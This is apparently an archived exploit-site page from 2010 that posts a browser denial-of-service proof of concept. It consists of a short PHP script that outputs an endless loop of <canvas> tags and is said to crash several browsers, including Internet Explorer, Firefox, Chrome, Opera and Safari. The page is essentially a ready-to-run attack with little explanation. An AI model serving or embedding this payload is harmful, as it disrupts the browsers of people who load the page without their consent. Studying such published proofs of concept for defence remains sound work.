Home / os / win7

Canvas tag DoS - Multiple Browsers

Posted on 27 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Canvas tag DoS - Multiple Browsers</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================== Canvas tag DoS - Multiple Browsers ================================== &lt;?php # Canvas tag DoS Internet Explorer 6.0 &amp; 8.0 # # Found by Jelmer de Hen # published at http://h.ackack.net/?p=269 # tested on: Windows XP SP3 # Internet Explorer 6.0 &amp; 8.0, Opera 10.52, Chrome 4.1, Firefox 3.6.3, Safari 4.0.5 echo &quot;&lt;html&gt;&lt;body&gt;&quot;; while (1){ echo &quot;&lt;canvas&gt;&quot;; } echo &quot;&lt;/body&gt;&quot;; echo &quot;&lt;/html&gt;&quot;; ?&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP